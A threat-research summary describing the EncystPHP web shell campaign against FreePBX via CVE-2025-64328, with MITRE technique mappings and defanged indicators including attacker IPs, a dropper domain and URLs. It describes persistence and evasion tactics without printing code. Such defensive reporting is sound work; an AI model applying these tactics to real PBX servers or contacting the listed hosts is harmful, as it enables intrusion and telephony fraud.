Threat Research

Unveiling the Weaponized Web Shell EncystPHP

Fortinet
Unveiling the Weaponized Web Shell EncystPHP

FortiGuard Labs discovered a Base64-encoded PHP web shell named EncystPHP deployed by exploiting FreePBX Endpoint Manager vulnerability CVE-2025-64328, enabling remote command execution, persistence, and telephony abuse. The campaign, attributed to INJ3CTOR3, delivered droppers from 45[.]234[.]176[.]202 (crm[.]razatelefonia[.]pro), created a root-level user and SSH backdoor, and maintained persistence via cron jobs and widespread web shell copies. #EncystPHP #FreePBX

Keypoints

  • FortiGuard Labs identified a PHP web shell named EncystPHP that was deployed via exploitation of FreePBX Endpoint Manager CVE-2025-64328.
  • Initial exploitation originated from infrastructure resolving to crm[.]razatelefonia[.]pro (45[.]234[.]176[.]202), which delivered droppers named c and k.php that decoded Base64 payloads.
  • EncystPHP modifies file permissions, removes competing web shells and logs, deletes FreePBX users/modules, and forges timestamps to hinder detection.
  • The actor established persistent control by creating a root-level account (newfpbx), injecting an SSH public key, resetting passwords, and installing multiple cron jobs and license/test scripts.
  • The web shell masquerades as legitimate FreePBX files (e.g., ajax.php) and exposes an “Ask Master” interface enabling arbitrary command execution and PBX/Asterisk operations.
  • Fortinet detections and protections (AV signatures, IPS, Web Filtering, IP reputation) are available for the IOCs and exploit CVE-2025-64328; impacted systems should be treated as fully compromised.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – Exploitation of FreePBX Endpoint Manager via CVE-2025-64328 to execute post-authentication command injection (‘Exploitation of FreePBX Endpoint Manager via CVE-2025-64328 to execute post-authentication command injection’).
  • [T1059.004 ] Command and Scripting Interpreter: Unix Shell – Execution of bash commands via injected payloads and downloaded shell scripts (‘Execution of Bash commands via injected payloads and downloaded shell scripts’).
  • [T1053.003 ] Scheduled Task/Job: Cron – Multiple crontab entries installed to repeatedly download and execute droppers to maintain persistence (‘Multiple crontab entries installed to repeatedly download and execute droppers’).
  • [T1505.003 ] Server Software Component: Web Shell – Deployment of EncystPHP masquerading as legitimate FreePBX PHP files (ajax.php, config.php) to provide remote access (‘Deployment of EncystPHP masquerading as legitimate FreePBX PHP files (ajax.php, config.php)’).
  • [T1068 ] Exploitation for Privilege Escalation – Abuse of FreePBX administrative context to execute commands with elevated privileges (‘Abuse of FreePBX administrative context to execute commands with elevated privileges’).
  • [T1136.001 ] Create Account: Local Account – Creation of a root-level user account newfpbx with UID 0 to maintain access (‘Creation of a root-level user account (newfpbx) with UID 0’).
  • [T1003 ] OS Credential Dumping – Collection of database credentials from /etc/freepbx.conf to harvest sensitive credentials (‘Collection of database credentials from /etc/freepbx.conf’).
  • [T1070.004 ] Indicator Removal on Host: File Deletion – Deletion of logs, cron artifacts, and the FreePBX Endpoint Manager module to erase traces (‘Deletion of logs, cron artifacts, and FreePBX Endpoint Manager module’).
  • [T1222.002 ] File and Directory Permissions Modification: Linux – Modification of file permissions to 000 on ajax.php and model.php to block inspection (‘Modification of file permissions to 000 to block access and disrupt inspection’).
  • [T1036.005 ] Masquerading: Match Legitimate Name or Location – Web shell written to legitimate FreePBX paths with forged timestamps to blend in (‘Web shell written to legitimate FreePBX file paths with forged timestamps’).
  • [T1562.001 ] Impair Defenses: Disable or Modify Tools – Removal of competing web shells and disabling error reporting to hinder detection (‘Removal of competing web shells and disabling error reporting’).
  • [T1021.004 ] Remote Services: SSH – Injection of attacker-controlled SSH public key and ensuring port 22 remains open for remote access (‘Injection of attacker-controlled SSH public key and forced exposure of port 22’).
  • [T1105 ] Ingress Tool Transfer – Repeated download of droppers (c, k.php) from attacker-controlled infrastructure to transfer tools (‘Repeated download of droppers (c, k.php) from attacker-controlled infrastructure’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Use of HTTP for payload delivery and command execution to communicate with C2 infrastructure (‘Use of HTTP for payload delivery and command execution’).
  • [T1496 ] Resource Hijacking – Abuse of PBX resources for unauthorized telephony operations and outbound call activity (‘Abuse of PBX resources for unauthorized telephony operations’).

Indicators of Compromise

  • [URLs ] download/dropper locations – hxxp://45[.]234[.]176[.]202/new/k.php, hxxp://45[.]234[.]176[.]202/new/ch
  • [Hosts / IPs ] attacker infrastructure and observed sources – 45[.]234[.]176[.]202, 187[.]108[.]1[.]130
  • [Domains ] C2 / dropper domain – crm[.]razatelefonia[.]pro (resolves to 45[.]234[.]176[.]202)
  • [Files / filenames ] dropped web shells and scripts – c (dropper), k.php (dropper), ajax.php (deployed web shell), and test.sh, license.php
  • [File hashes ] malware binaries/samples – 71d94479d58c32d56…b26b8c7 (long concatenated hash provided in report) and other sample hashes
  • [Accounts ] created or modified system accounts – newfpbx (root-level account created), modified users such as ampuser and svc_freepbx

Read more: https://feeds.fortinet.com/~/943094408/0/fortinet/blog/threat-research~Unveiling-the-Weaponized-Web-Shell-EncystPHP